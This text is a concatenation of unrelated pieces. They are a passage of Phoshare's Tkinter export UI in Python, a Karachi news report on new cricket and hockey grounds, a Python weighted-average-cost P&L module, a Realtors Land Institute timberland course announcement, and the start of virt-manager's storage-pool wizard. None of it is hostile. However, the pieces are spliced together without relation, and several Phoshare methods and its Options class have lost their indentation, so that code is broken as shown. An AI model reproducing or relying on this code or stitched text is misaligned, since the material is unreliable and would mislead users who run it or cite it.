        entry = Entry(lf, textvariable=self.face_albums_text)
        entry.grid(row=2, column=2, sticky=E+W)
    def create_widgets(self):
        """Builds the UI: a three-tab notebook, the button bar, and the
        scrolling progress/output area."""
        self.columnconfigure(0, weight=1)
        n = Notebook(self)
        n.grid(row=0, sticky=E+W+N+S)
        # One tab per settings group.
        library_tab = Frame(n)
        n.add(library_tab, text='Library')
        self._create_library_tab(library_tab)
        files_tab = Frame(n)
        n.add(files_tab, text='Files')
        self._create_files_tab(files_tab)
        metadata_tab = Frame(n)
        n.add(metadata_tab, text='Metadata')
        self._create_metadata_tab(metadata_tab)
        self._create_button_bar(self, 1)
        # Output area below the notebook; row 2 takes all extra vertical
        # space when the window is resized.
        self.text = ScrolledText(self, borderwidth=4, relief=RIDGE, padx=4,
                                 pady=4)
        self.text.grid(row=2, column=0, sticky=E+W+N+S)
        self.rowconfigure(2, weight=1)
def change_iptc_box(self):
"""Clears some options that depend on the metadata export option."""
mode = self.iptc_var.get()
if not mode:
self.faces_var.set(0)
self.face_keywords_var.set(0)
self.iptc_all_var.set(0)
self.gps_var.set(0)
def change_metadata_box(self):
"""Sets connected options if an option that needs meta data is changed.
"""
mode = (self.faces_var.get() or self.face_keywords_var.get() or
self.iptc_all_var.get() or self.gps_var.get())
if mode:
self.iptc_var.set(1)
    def help_events(self):
        """Shows help on the Events/Albums/Smart Albums filter fields."""
        HelpDialog(self, """Events, Albums and Smart Albums

Selects which events, albums, or smart albums to export.

Each field is a regular expression, and at least one must be filled in.
Matches are done against the beginning of the event or album name. An
entry in Events of
    Family
will export all events that start with "Family", including "Family 2008"
and "Family 2009". "|" separates alternate patterns, so
    Family|Travel
will export all events that start with either "Family" or "Travel".

"." matches any character, and therefore,
    .
will export all events. To export all events with "2008" in the name, use
    .*2008

For more details on regular expressions, see
    http://en.wikipedia.org/wiki/Regular_expression""")
    def help_templates(self):
        """Shows help on the folder/file/caption name template syntax."""
        HelpDialog(self, """Folder, file, and image caption templates.

Templates are strings with place holders for values. The place holders have
the format "{name}". Everything else in the template will be copied. Examples:
  {title}
  {yyyy}/{mm}/{dd} {title} - generates "2010/12/31 My Birthday" if the date
      of the pictures is Dec 31, 2010, and the title is "My Birthday".
  {yyyy} Event: {event} - generates "2010 Event: Birthday" for an event with
      any date in 2010 and the name "Birthday".

Available place holders for folder names:
  {name} - name of the album or event.
  {hint} - folder hint (taken from line event or album description starting with
           @).
  {yyyy} - year of album or event date.
  {mm} - month of album or event date.
  {dd} - date of album or event date.

Available place holders for file names:
  {album} - name of album (or in the case of an event, the name of the event).
  {index} - number of image in album, starting at 1.
  {index0} - number of image in album, padded with 0s, so that all numbers have
             the same length.
  {event} - name of the event. In the case of an album, the name of the event
            to which the image belongs.
  {event_index} - number of image in the event, starting at 1. If the case of an
                  album, this number will be based on the event to which the
                  image belongs.
  {event_index0} - same as {event_index}, but padded with leading 0s so that all
                   values have the same length.
  {title} - image title.
  {yyyy} - year of image.
  {mm} - month of image (01 - 12).
  {dd} - day of image (01 - 31).

If you are using {album}/{index}/{index0} place holders, the image will be
named based on whatever album or event it is contained. That means an image
in two albums will be exported with different names, even so the files are
identical. If you want to use the same name for each image, regardless of
which album it is in, use {event}, {event_index}, and {event_index0} instead.

Available place holders for captions:
  {title} - image title.
  {description} - image description.
  {title_description} - concatenated image title and description, separated by a
                        : if both are set.
  {yyyy} - year of image.
  {mm} - month of image (01 - 12).
  {dd} - day of image (01 - 31).
""")
    def help_buttons(self):
        """Shows help on the Dry Run / Export buttons."""
        HelpDialog(self, """Export modes.

Click on "Dry Run" to see what Phoshare would do without actually modifying any
files.

Click on "Export" to export your files using the current settings.

All your settings will be saved when you click either Dry Run and Export, and
re-loaded if you restart Phoshare.

Check "Show debug output" to generate additional output message that can assist
in debugging Phoshare problems.
""")
    def help_export(self):
        """Shows help on the export folder and export option checkboxes."""
        HelpDialog(self, """Export Settings

Export Folder: path to the folder for exporting images.

Overwrite changed pictures: If set, pictures that already exist in the export
                  folder will be overriden if an different version
                  exist in iPhoto. Any edits made to previously
                  exported images in the export folder will be lost!
                  Use Dry Run to see which files would be overwritten.

Export originals: If set, and an image has been modified in iPhoto, both the
                  original and the edited version will be exported. The original
                  will be stored in a sub-folder called "Originals".

Use folder hints: By default, each exported event or album will become a folder
                  in the export folder. With folder hints, a sub-folder name can
                  be given in the event or album description by adding a line
                  starting with a @ character. Example:
                      Family Vacation
                      @Vacation
                  would export all images in that event into a sub-folder called
                  "Vacation".

Delete obsolete pictures: If set, any image, movie file or folder in the export
                  folder that does not exist in the iPhoto library will
                  be deleted. Use Dry Run to see which files would be
                  deleted.

Use file links: Don't copy images during export, but make a link to the files
                in the iPhoto library instead. This option is only available
                if the export folder is on the same drive as the iPhoto library.
                This option will save a lot of disk space because it avoids
                making copies of all your images and videos. Using this option
                causes the metadata of the images IN YOUR IPHOTO LIBRARY to be
                modified. While phoshare should not cause any problems to your
                images, it is best to use this option only if you have a backup
                of your iPhoto library, and you know how to restore your library
                from the backup. For more details on link mode, see
                https://sites.google.com/site/phosharedoc/Home#TOC-link-mode""")
    def help_faces(self):
        """Shows help on the Faces export options."""
        HelpDialog(self, """Faces options.

Copy faces into metadata: faces tags and face regions will be copied into the
             image metadata using the Microsoft Photo Region
             Schema:
             http://msdn.microsoft.com/en-us/library/ee719905(VS.85).aspx

Copy faces names into keywords: If set, face names will be merged into image
             keywords. Requires "Export metadata" checked.

Export faces into folders: If checked, folders will be created for each face
             tag, each containing all the images tagged with
             that person.

Faces folder prefix: If set, the string will be used as a prefix for the
             face export folders if "Exported faces into folders"
             is checked. This can be just a value like "Face: ", or
             a sub-folder name like "Faces/" if it ends with a "/"

Metadata options will be disabled if exiftool is not available.
""")
    def help_metadata(self):
        """Shows help on the metadata export options."""
        HelpDialog(self, """Metadata options.

Export metadata: sets the description, keywords, rating and date metadata in the
                 exported images to match the iPhoto settings.

Check previously exported images: If not checked, metadata will only be set for new or
                 updated images. If checked, metadata will be checked in
                 all images, including ones that were previously
                 exported. This is much slower.

Export GPS data: export the GPS coordinates into the image metadata.

Metadata options will be disabled if exiftool is not available.""")
    def check_iphoto_library(self):
        """Starts a background check of the configured iPhoto library path.

        Disables the run buttons until the check reports back through
        set_library_status().
        """
        self.valid_library = False
        self.enable_buttons()
        self.iphoto_library_status.set("Checking library location...")
        # "library" mode only loads the library and reports success/failure.
        self.launch_export("library")
def set_library_status(self, good, message):
if good:
self.valid_library = True
self.enable_buttons()
self.iphoto_library_status.set(message)
    def write_progress(self, text):
        """Appends text to the output area and scrolls it into view.
        Must be called from the UI thread (see write() for the thread-safe
        variant)."""
        self.text.insert(END, text)
        self.text.see(END)
def enable_buttons(self):
if self.valid_library:
self.dryrun_button.config(state=NORMAL)
self.export_button.config(state=NORMAL)
else:
self.dryrun_button.config(state=DISABLED)
self.export_button.config(state=DISABLED)
self.browse_library_button.config(state=NORMAL)
    def browse_library(self):
        """Asks the user to locate the iPhoto library, then re-checks it."""
        path = tkFileDialog.askopenfilename(title="Locate iPhoto Library")
        self.iphoto_library.set(path)
        self.check_iphoto_library()
    def browse_export(self):
        """Asks the user to pick the export destination folder."""
        path = tkFileDialog.askdirectory(title="Locate Export Folder")
        self.export_folder.set(path)
def do_export(self):
if self.active_library:
self.stop_thread()
return
if not self.can_export():
return
self.export_button.config(text="Stop Export")
self.dryrun_button.config(state=DISABLED)
self.run_export(False)
def do_dryrun(self):
if self.active_library:
self.stop_thread()
return
if not self.can_export():
return
self.dryrun_button.config(text="Stop Dry Run")
self.export_button.config(state=DISABLED)
self.run_export(True)
    def stop_thread(self):
        """Asks the running export operation (if any) to abort."""
        if self.active_library:
            self.active_library.abort()
    def export_done(self):
        """Resets the UI after an export or dry run has finished."""
        self.active_library = None
        # Restore the button labels changed by do_export()/do_dryrun().
        self.dryrun_button.config(text="Dry Run")
        self.export_button.config(text="Export")
        self.enable_buttons()
class Options(object):
"""Simple helper to create an object compatible with the OptionParser
output in Phoshare.py."""
def __init__(self):
self.iphoto = '~/Pictures/iPhoto Library'
self.export = '~/Pictures/Album'
self.albums = ''
self.events = '.'
self.smarts = ''
self.ignore = []
self.delete = False
self.update = False
self.link = False
self.dryrun = False
self.folderhints = False
self.captiontemplate = u'{description}'
self.foldertemplate = u'{name}'
self.nametemplate = u'{title}'
self.aperture = False # TODO
self.size = '' # TODO
self.picasa = False # TODO
self.movies = True # TODO
self.originals = False
self.iptc = 0
self.gps = False
self.faces = False
self.facealbums = False
self.facealbum_prefix = ''
self.face_keywords = False
self.verbose = False
def load(self):
"""Attempts to load saved options. Returns True if saved options
were available."""
if not os.path.exists(_CONFIG_PATH):
return False
config = ConfigParser.SafeConfigParser()
config.read(_CONFIG_PATH)
s = 'Export1'
if config.has_option(s, 'iphoto'):
self.iphoto = config.get(s, 'iphoto')
if config.has_option(s, 'export'):
self.export = config.get(s, 'export')
if config.has_option(s, 'albums'):
self.albums = config.get(s, 'albums')
if config.has_option(s, 'events'):
self.events = config.get(s, 'events')
if config.has_option(s, 'smarts'):
self.smarts = config.get(s, 'smarts')
if config.has_option(s, 'foldertemplate'):
self.foldertemplate = config.get(s, 'foldertemplate')
if config.has_option(s, 'nametemplate'):
self.nametemplate = config.get(s, 'nametemplate')
if config.has_option(s, 'captiontemplate'):
self.captiontemplate = config.get(s, 'captiontemplate')
if config.has_option(s, 'delete'):
self.delete = config.getboolean(s, 'delete')
if config.has_option(s, 'update'):
self.update = config.getboolean(s, 'update')
if config.has_option(s, 'link'):
self.link = config.getboolean(s, 'link')
if config.has_option(s, 'folderhints'):
self.folderhints = config.getboolean(s, 'folderhints')
if config.has_option(s, 'captiontemplate'):
self.nametemplate = unicode(config.get(s, 'captiontemplate'))
if config.has_option(s, 'nametemplate'):
self.nametemplate = unicode(config.get(s, 'nametemplate'))
if config.has_option(s, 'size'):
self.size = config.get(s, 'size')
if config.has_option(s, 'picasa'):
self.picasa = config.getboolean(s, 'picasa')
if config.has_option(s, 'movies'):
self.movies = config.getboolean(s, 'movies')
if config.has_option(s, 'originals'):
self.originals = config.getboolean(s, 'originals')
if config.has_option(s, 'iptc'):
self.iptc = config.getint(s, 'iptc')
if config.has_option(s, 'gps'):
self.gps = config.getboolean(s, 'gps')
if config.has_option(s, 'faces'):
self.faces = config.getboolean(s, 'faces')
if config.has_option(s, 'facealbums'):
self.facealbums = config.getboolean(s, 'facealbums')
if config.has_option(s, 'facealbum_prefix'):
self.facealbum_prefix = config.get(s, 'facealbum_prefix')
if config.has_option(s, 'face_keywords'):
self.face_keywords = config.getboolean(s, 'face_keywords')
return True
def save(self):
"""Saves the current options into a file."""
config = ConfigParser.RawConfigParser()
s = 'Export1'
config.add_section(s)
config.set(s, 'iphoto', self.iphoto)
config.set(s, 'export', self.export)
config.set(s, 'albums', su.fsenc(self.albums))
config.set(s, 'events', su.fsenc(self.events))
config.set(s, 'smarts', su.fsenc(self.smarts))
config.set(s, 'foldertemplate', su.fsenc(self.foldertemplate))
config.set(s, 'nametemplate', su.fsenc(self.nametemplate))
config.set(s, 'captiontemplate', su.fsenc(self.captiontemplate))
config.set(s, 'delete', self.delete)
config.set(s, 'update', self.update)
config.set(s, 'link', self.link)
config.set(s, 'dryrun', self.dryrun)
config.set(s, 'folderhints', self.folderhints)
config.set(s, 'captiontemplate', self.captiontemplate)
config.set(s, 'nametemplate', self.nametemplate)
config.set(s, 'size', self.size)
config.set(s, 'picasa', self.picasa)
config.set(s, 'movies', self.movies)
config.set(s, 'originals', self.originals)
config.set(s, 'iptc', self.iptc)
config.set(s, 'gps', self.gps)
config.set(s, 'faces', self.faces)
config.set(s, 'facealbums', self.facealbums)
config.set(s, 'facealbum_prefix', self.facealbum_prefix)
config.set(s, 'face_keywords', self.face_keywords)
config_folder = os.path.split(_CONFIG_PATH)[0]
if not os.path.exists(config_folder):
os.makedirs(config_folder)
configfile = open(_CONFIG_PATH, 'wb')
config.write(configfile)
configfile.close()
def can_export(self):
if (not self.albums.get() and not self.events.get() and
not self.smarts.get()):
tkMessageBox.showerror(
"Export Error",
("Need to specify at least one event, album, or smart album "
"for exporting."))
return False
return True
def run_export(self, dry_run):
mode = "export"
if dry_run:
mode = "dry_run"
self.launch_export(mode)
    def launch_export(self, mode):
        """Launch an export operation in a new thread, to not block the UI.

        Args:
            mode - name of operation to run, "library", "dry_run", or "export".
        """
        # Clear the output area and block library re-browsing while running.
        self.text.delete('1.0', END)
        self.browse_library_button.config(state=DISABLED)
        # Results come back through self.thread_queue (see thread_checker).
        export_thread = threading.Thread(target=self.export_thread,
                                         args=(mode,))
        export_thread.start()
    def export_thread(self, mode):
        """Run an export operation in a thread, to not block the UI.

        Communicates with the UI thread exclusively through
        self.thread_queue: progress via self.write(), completion via a
        ("done", (success, mode, message)) tuple.

        Args:
            mode - name of operation to run, "library", "dry_run", or "export".
        """
        try:
            # First, load the iPhoto library.
            library_path = su.expand_home_folder(self.iphoto_library.get())
            album_xml_file = iphotodata.get_album_xmlfile(library_path)
            data = iphotodata.get_iphoto_data(album_xml_file)
            msg = "Version %s library with %d images" % (
                data.applicationVersion, len(data.images))
            self.write(msg + '\n')
            if mode == "library":
                # If we just need to check the library, we are done here.
                self.thread_queue.put(("done", (True, mode, msg)))
                return
            # Do the actual export. 'args' accumulates an equivalent
            # Phoshare.py command line, echoed below so the run can be
            # reproduced from a shell.
            export_folder = su.expand_home_folder(self.export_folder.get())
            args = ['Phoshare.py', '--export', '"' + export_folder + '"']
            # Mirror the current UI state into an Options object.
            options = self.Options()
            options.iphoto = self.iphoto_library.get()
            args.extend(['--iphoto', '"' + options.iphoto + '"'])
            options.export = self.export_folder.get()
            options.dryrun = mode == "dry_run"
            options.albums = self.albums.get()
            if options.albums:
                args.extend(['--albums', '"' + options.albums + '"'])
            options.events = self.events.get()
            if options.events:
                args.extend(['--events', '"' + options.events + '"'])
            options.smarts = self.smarts.get()
            if options.smarts:
                args.extend(['--smarts', '"' + options.smarts + '"'])
            options.foldertemplate = unicode(self.foldertemplate.get())
            if options.foldertemplate:
                args.extend(['--foldertemplate', '"' +
                             options.foldertemplate + '"'])
            options.nametemplate = unicode(self.nametemplate.get())
            if options.nametemplate:
                args.extend(['--nametemplate', '"' +
                             options.nametemplate + '"'])
            options.captiontemplate = unicode(self.captiontemplate.get())
            if options.captiontemplate:
                args.extend(['--captiontemplate', '"' +
                             options.captiontemplate + '"'])
            options.ignore = []  # TODO
            options.update = self.update_var.get() == 1
            if options.update:
                args.append('--update')
            options.delete = self.delete_var.get() == 1
            if options.delete:
                args.append('--delete')
            options.originals = self.originals_var.get() == 1
            if options.originals:
                args.append('--originals')
            options.link = self.link_var.get() == 1
            if options.link:
                args.append('--link')
            options.folderhints = self.folder_hints_var.get() == 1
            if options.folderhints:
                args.append('--folderhints')
            options.faces = self.faces_var.get() == 1
            if options.faces:
                args.append('--faces')
            options.face_keywords = self.face_keywords_var.get() == 1
            if options.face_keywords:
                args.append('--face_keywords')
            # "check all" (iptc=2) takes precedence over plain iptc=1.
            if self.iptc_all_var.get() == 1:
                options.iptc = 2
                args.append('--iptcall')
            elif self.iptc_var.get() == 1:
                options.iptc = 1
                args.append('--iptc')
            else:
                options.iptc = 0
            options.gps = self.gps_var.get()
            if options.gps:
                args.append('--gps')
            options.facealbums = self.face_albums_var.get() == 1
            if options.facealbums:
                args.append('--facealbums')
            options.facealbum_prefix = self.face_albums_text.get()
            if options.facealbum_prefix:
                # NOTE(review): only the flag is echoed here; the prefix
                # value itself is missing from the command line -- confirm.
                args.append('--facealbum_prefix')
            exclude = None  # TODO
            # Persist the settings so they are restored on next launch.
            options.save()
            print " ".join(args)
            self.logging_handler.setLevel(logging.DEBUG if self.verbose_var.get() else logging.INFO)
            self.active_library = phoshare_main.ExportLibrary(export_folder)
            phoshare_main.export_iphoto(self.active_library, data, exclude,
                                        options)
            self.thread_queue.put(("done", (True, mode, '')))
        except Exception, e:  # IGNORE:W0703
            # Report the failure (with traceback) back to the UI thread.
            self.thread_queue.put(("done",
                                   (False, mode,
                                    str(e) + '\n\n' + traceback.format_exc())))
    def thread_checker(self, delay_ms=100):  # 10x per second
        """Processes any queued up messages in the thread queue. Once the queue
        is empty, schedules another check after a short delay.

        Understands two message shapes put by the worker thread:
          ("write", text)                  - append text to the output area.
          ("done", (success, mode, msg))   - an operation finished.

        This method runs in the main thread, and therefore, can update the UI.
        """
        writes = 0
        while True:
            try:
                (callback, args) = self.thread_queue.get(block=False)
                if callback == "write":
                    self.write_progress(args)
                    writes += 1
                    if writes >= 10:
                        # After 10 consecutive writes to the progress area,
                        # update the UI so that the user can see the progress.
                        self.update()
                        writes = 0
                    continue
                # Must be a "done" message, with a (success, mode, msg)
                # argument.
                success = args[0]
                mode = args[1]
                msg = args[2]
                if success:
                    self.write_progress("Done!")
                else:
                    self.write_progress("Error: " + msg)
                if mode == "library":
                    self.set_library_status(success, msg)
                else:
                    self.export_done()
            except Queue.Empty:
                break
        # Check the queue again after a short delay.
        self.after(delay_ms, self.thread_checker)
    def write(self, text):
        """Writes text to the progress area of the UI. Uses the thread queue,
        and can be called from a non-UI thread. (Also makes this object a
        file-like target for sys.stdout and the logging StreamHandler.)"""
        self.thread_queue.put(("write", text))
    def writelines(self, lines):  # lines already have '\n'
        """Writes text to the progress area of the UI. Uses the thread queue,
        and can be called from a non-UI thread."""
        # Each line is queued individually through write().
        for line in lines:
            self.write(line)
def main():
    """Main routine for phoshare_ui. Typically launched from Phoshare.py"""
    app = ExportApp()
    app.master.title(phoshare_version.PHOSHARE_VERSION)
    # Redirect stdout into the app's progress area (ExportApp.write).
    sys.stdout = app
    try:
        app.init()
        app.mainloop()
    except Exception, e:
        # Fatal error: dump full diagnostics (traceback, OS and Python
        # versions) into the progress area so the user can copy them into
        # a bug report, then show an error dialog and re-raise.
        f = cStringIO.StringIO()
        traceback.print_exc(file=f)
        app.write_progress('--- Fatal Error ---\n')
        app.write_progress('Please include the information below in your bug'
                           ' report.\n\n')
        app.write_progress('%s\n\n%s\n' % (str(e), f.getvalue()))
        app.write_progress('\n'.join(os.uname()))
        app.write_progress('\nMac version: %s\n' % (platform.mac_ver()[0]))
        app.write_progress('Python version: %s\n' % (platform.python_version()))
        tkMessageBox.showerror(
            'Phoshare Error',
            'Phoshare encountered a serious problem and will shut down. '
            'Please copy the information shown in the application output panel '
            'when reporting this problem at\n'
            'http://code.google.com/p/phoshare/issues/entry\n\n%s.' % (str(e)))
        raise e
# Allow running this module directly (normally launched via Phoshare.py).
if __name__ == "__main__":
    main()
|
The city government will install Astroturf at the hockey ground of North Karachi town with a cost of Rs25 million, said City Nazim Syed Mustafa Kamal.
Talking to journalists after inaugurating a cricket ground in sector 11-E, North Karachi on Sunday, the Nazim said that the construction of more than 20 floodlight stadiums and cricket academies was also under way in all 18 towns of the city.
Provincial Sports Minister, Dr Muhammad Ali Shah; Minister for Youth Affairs, Sindh Faisal Subzwari; Town Nazim North Karachi, Akhtar Hussain; Town Nazim North Nazimabad, Mumtaz Hameed; prominent sports personalities and a large number of people were also present on the occasion.
Kamal said that the Haq Parast city government had started implementing the plan to construct cricket stadiums with floodlights in every town, adding that national cricket experts would be consulted on this project. He also directed the North Karachi Town Nazim to construct a sports academy and sports complex at the site adjacent to the cricket ground. He said that the complex should also have a hockey ground, which would be the second Astroturf hockey ground constructed by the city government in Karachi.
The city Nazim also asked Faisal Subzwari to provide technical coordination for the establishment of a sports academy in North Karachi.
Earlier, thousands of people, including many sports lovers, gave Kamal and Subzwari a warm welcome when they arrived at the ground.
An exhibition cricket match, supervised by the organisers, was also held after the inauguration of the ground. The match was played between City Nazim XI and N. Karachi Town XI. Kamal and Subzwari represented the City Nazim XI and also opened the innings for their team.
North Karachi Town Eleven had Shah, Hussain and Hameed as the main players. Other cricketers also played in the match. A good number of spectators enjoyed the exhibition match at the newly-inaugurated ground in North Karachi.
|
import logging
import math
import numpy
class ZeroFeeModel(object):
    """Fee model that never charges anything, whatever the trade size."""

    def compute_fees(self, quantity, price):
        """Returns the commission (always 0.0) for a trade of `quantity`
        units at `price`."""
        del quantity, price  # unused: this model is always free
        return 0.
class InteractiveBrokersStockUSFeeModel(object):
    """Approximation of Interactive Brokers' fixed pricing for US stocks:
    0.005 per share, at least 1.0 per order, capped at 0.5% of trade value.
    """

    def compute_fees(self, quantity, price):
        """Returns the commission for `quantity` shares traded at `price`."""
        value_cap = quantity * price * 0.5 / 100
        per_share_fee = 0.005 * quantity
        # NOTE(review): when the 0.5% cap falls below the 1.0 minimum, the
        # minimum wins here and the cap is exceeded -- confirm intended.
        return max(min(value_cap, per_share_fee), 1.)
class AverageCostProfitAndLoss(object):
    """
    Computes P&L based on weighted average cost method.

    Positions may be long (positive quantity) or short (negative). Fills
    that flip or reduce the position realize P&L against the average cost.
    """

    def __init__(self, quantity=0, cost=0., realized_pnl=0, fee_model=None):
        """
        :param quantity: initial signed position size.
        :param cost: initial acquisition cost of the position.
        :param realized_pnl: initial realized P&L.
        :param fee_model: object exposing compute_fees(quantity, price);
            defaults to InteractiveBrokersStockUSFeeModel for backward
            compatibility with the previous hard-coded model.
        """
        self._quantity = quantity
        self._cost = cost
        self._realized_pnl = realized_pnl
        if fee_model is None:
            fee_model = InteractiveBrokersStockUSFeeModel()
        self.fee_model = fee_model

    @property
    def realized_pnl(self):
        """P&L realized so far by closing trades, net of fees."""
        return self._realized_pnl

    @property
    def acquisition_cost(self):
        """Total cost of the current open position."""
        return self._cost

    @property
    def quantity(self):
        """Current signed position size."""
        return self._quantity

    @property
    def average_price(self):
        """Average entry price of the position, or NaN when flat."""
        if self._quantity == 0:
            # numpy.nan (not the NaN alias, which NumPy 2.0 removed).
            return numpy.nan
        return self._cost / self._quantity

    def calc_market_value(self, current_price):
        """Returns the position's market value at current_price."""
        return self.quantity * current_price

    def calc_unrealized_pnl(self, current_price):
        """Returns the paper P&L of the open position at current_price."""
        return self.calc_market_value(current_price) - self.acquisition_cost

    def calc_total_pnl(self, current_price):
        """Returns realized plus unrealized P&L at current_price."""
        return self.realized_pnl + self.calc_unrealized_pnl(current_price)

    def add_fill(self, fill_qty, fill_price):
        """
        Adding a fill to the record updates the P&L values.

        :param fill_qty: signed fill size (negative for a sell).
        :param fill_price: execution price of the fill.
        :return: None
        """
        logging.debug('adding fill: %s at %s (amount: %.2f)', fill_qty, fill_price, fill_qty * fill_price)
        old_qty = self._quantity
        if old_qty == 0:
            # Opening a fresh position.
            self._quantity = fill_qty
            self._cost = fill_qty * fill_price
        else:
            old_cost = self._cost
            old_realized = self._realized_pnl
            closing_qty = 0
            opening_qty = fill_qty
            if math.copysign(1, old_qty) != math.copysign(1, fill_qty):
                # Fill goes against the position: split it into the part
                # that closes existing quantity and the part that opens a
                # new (possibly reversed) position.
                closing_qty = min(abs(old_qty), abs(fill_qty)) * math.copysign(1, fill_qty)
                opening_qty = fill_qty - closing_qty
            self._quantity = old_qty + fill_qty
            # Closed quantity leaves at average cost; opened quantity
            # enters at the fill price.
            self._cost = old_cost + (opening_qty * fill_price) + (closing_qty * old_cost / old_qty)
            self._realized_pnl = old_realized + closing_qty * (old_cost / old_qty - fill_price)
        # NOTE(review): fees are computed on the signed fill quantity; for
        # sells (negative qty) the IB model then degenerates to the 1.0
        # minimum -- confirm whether abs(fill_qty) was intended.
        self._realized_pnl -= self.fee_model.compute_fees(fill_qty, fill_price)
|
The Alabama Chapter of the Realtors Land Institute is proud to offer an outstanding education and networking opportunity for real estate brokers, licensees, and timberland owners.
This 2-day REALTORS Land Institute (RLI) Land University course introduces participants to everything needed to successfully conduct timberland transactions. Whether you are a seasoned land professional or a commercial/residential agent looking to expand your business by taking on new clients, this timberland course is a worthwhile investment.
Registration includes all course materials, continental breakfast, lunch and snacks on both dates.
This course meets the 16 hour elective requirements to go toward earning the coveted Accredited Land Consultant (ALC) designation.
Please pre-register so we have an accurate count for course materials and meals.
The information included in the materials and provided by presenters or participants is for informational purposes only and should not be a substitute for legal, accounting or other professional services. Realtor’s Land Institute and its officers, directors and employees do not warrant that the use of the materials would be adequate to discharge the legal or professional liability of participants in the conduct of their business operations. With regard to the information provided, neither Realtor’s Land Institute nor any of its directors, officers or employees, makes any warranty, express or implied, including the warranties of merchantability and fitness for a particular purpose, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. The views and opinions expressed do not necessarily state or reflect those of Realtor’s Land Institute nor is any information meant to be construed as an endorsement of any product or service.
|
#
# Copyright (C) 2008 Red Hat, Inc.
# Copyright (C) 2008 Cole Robinson <crobinso@redhat.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA.
#
import gtk
import copy
import logging
from virtManager import util
from virtManager.baseclass import vmmGObjectUI
from virtManager.asyncjob import vmmAsyncJob
from virtinst import Storage
PAGE_NAME = 0
PAGE_FORMAT = 1
_comboentry_xml = """
<interface>
<object class="GtkComboBoxEntry" id="pool-source-path">
<property name="visible">True</property>
<signal name="changed" handler="on_pool_source_path_changed"/>
<signal name="focus" handler="on_pool_source_path_focus"/>
</object>
<object class="GtkComboBoxEntry" id="pool-target-path">
<property name="visible">True</property>
<signal name="changed" handler="on_pool_target_path_changed"/>
<signal name="focus_in_event" handler="on_pool_target_path_focus_in_event"/>
</object>
</interface>
"""
class vmmCreatePool(vmmGObjectUI):
def __init__(self, conn):
vmmGObjectUI.__init__(self,
"vmm-create-pool.ui",
"vmm-create-pool")
self.conn = conn
self._pool = None
self._pool_class = Storage.StoragePool
self.window.add_from_string(_comboentry_xml)
self.widget("pool-source-box").pack_start(
self.widget("pool-source-path"))
self.widget("pool-target-box").pack_start(
self.widget("pool-target-path"))
self.window.connect_signals({
"on_pool_forward_clicked" : self.forward,
"on_pool_back_clicked" : self.back,
"on_pool_cancel_clicked" : self.close,
"on_vmm_create_pool_delete_event" : self.close,
"on_pool_finish_clicked" : self.forward,
"on_pool_pages_change_page" : self.page_changed,
"on_pool_source_button_clicked" : self.browse_source_path,
"on_pool_target_button_clicked" : self.browse_target_path,
"on_pool_name_activate": self.forward,
"on_pool_hostname_activate" : self.hostname_changed,
"on_pool_iqn_chk_toggled": self.iqn_toggled,
"on_pool_name_focus_in_event": (self.update_doc, "name",
"pool-info1"),
# I cannot for the life of me get a combobox to abide
# focus-in, button-pressed, motion-over, etc.
"on_pool_type_focus": (self.update_doc, "type", "pool-info1"),
"on_pool_type_changed": (self.update_doc_changed, "type",
"pool-info1"),
"on_pool_format_focus": (self.update_doc, "format", "pool-info2"),
"on_pool_format_changed": (self.update_doc_changed, "format",
"pool-info2"),
"on_pool_target_path_focus_in_event": (self.update_doc,
"target_path",
"pool-info2"),
"on_pool_target_path_focus": (self.update_doc, "target_path",
"pool-info2"),
"on_pool_target_path_changed": (self.update_doc_changed,
"target_path",
"pool-info2"),
"on_pool_source_path_focus_in_event": (self.update_doc,
"source_path",
"pool-info2"),
"on_pool_source_path_focus": (self.update_doc, "source_path",
"pool-info2"),
"on_pool_source_path_changed": (self.update_doc_changed,
"source_path",
"pool-info2"),
"on_pool_hostname_focus_in_event": (self.update_doc, "host",
"pool-info2"),
"on_pool_build_focus_in_event": (self.update_build_doc),
"on_pool_iqn_focus_in_event": (self.update_doc, "iqn",
"pool-info2"),
})
self.bind_escape_key_close()
# XXX: Help docs useless/out of date
self.widget("pool-help").hide()
finish_img = gtk.image_new_from_stock(gtk.STOCK_QUIT,
gtk.ICON_SIZE_BUTTON)
self.widget("pool-finish").set_image(finish_img)
self.set_initial_state()
def show(self, parent):
logging.debug("Showing new pool wizard")
self.reset_state()
self.topwin.set_transient_for(parent)
self.topwin.present()
def close(self, ignore1=None, ignore2=None):
logging.debug("Closing new pool wizard")
self.topwin.hide()
return 1
def _cleanup(self):
self.conn = None
self._pool = None
def set_initial_state(self):
self.widget("pool-pages").set_show_tabs(False)
type_list = self.widget("pool-type")
type_model = gtk.ListStore(str, str)
type_list.set_model(type_model)
text1 = gtk.CellRendererText()
type_list.pack_start(text1, True)
type_list.add_attribute(text1, 'text', 1)
format_list = self.widget("pool-format")
format_model = gtk.ListStore(str, str)
format_list.set_model(format_model)
text2 = gtk.CellRendererText()
format_list.pack_start(text2, False)
format_list.add_attribute(text2, 'text', 1)
# Target path combo box entry
target_list = self.widget("pool-target-path")
# target_path, Label, pool class instance
target_model = gtk.ListStore(str, str, object)
target_model.set_sort_column_id(0, gtk.SORT_ASCENDING)
target_list.set_model(target_model)
target_list.set_text_column(0)
target_list.child.connect("focus-in-event", self.update_doc,
"target_path", "pool-info2")
# Source path combo box entry
source_list = self.widget("pool-source-path")
# source_path, Label, pool class instance
source_model = gtk.ListStore(str, str, object)
source_model.set_sort_column_id(0, gtk.SORT_ASCENDING)
source_list.set_model(source_model)
source_list.set_text_column(0)
source_list.child.connect("focus-in-event", self.update_doc,
"source_path", "pool-info2")
self.populate_pool_type()
self.widget("pool-info-box1").modify_bg(gtk.STATE_NORMAL,
gtk.gdk.color_parse("grey"))
self.widget("pool-info-box2").modify_bg(gtk.STATE_NORMAL,
gtk.gdk.color_parse("grey"))
def reset_state(self):
self.widget("pool-pages").set_current_page(0)
self.widget("pool-forward").show()
self.widget("pool-finish").hide()
self.widget("pool-back").set_sensitive(False)
self.widget("pool-name").set_text("")
